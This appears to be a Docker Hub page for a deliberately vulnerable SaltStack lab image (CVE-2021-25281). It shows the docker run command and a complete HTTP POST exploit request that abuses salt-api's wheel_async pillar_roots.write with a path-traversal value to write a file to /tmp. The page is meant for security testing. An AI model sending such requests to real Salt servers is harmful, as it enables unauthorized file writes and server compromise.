Saltstack install vulnerable to CVE-2021-25281
1.1K
The below command will start a container and run the salt-master and salt-api process. The salt-api service will be running on TCP/8000.
docker run -it transmissionator/cve-2021-25281 ./start
Send the below post to the target. Note you will need to specify your own IP address in the request.
POST /run HTTP/1.1
Host: <target address>:8000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/json
Content-Length: 158
Connection: close
{"client":"wheel_async","fun":"pillar_roots.write","data":"just another test","path":"../../../../../../../tmp/test","username":"anything","password":"anything","eauth":"pam"}
The above request will write the "just another test" string to /tmp/test
Content type
Image
Digest
Size
194.4 MB
Last updated
over 5 years ago
docker pull transmissionator/cve-2021-25281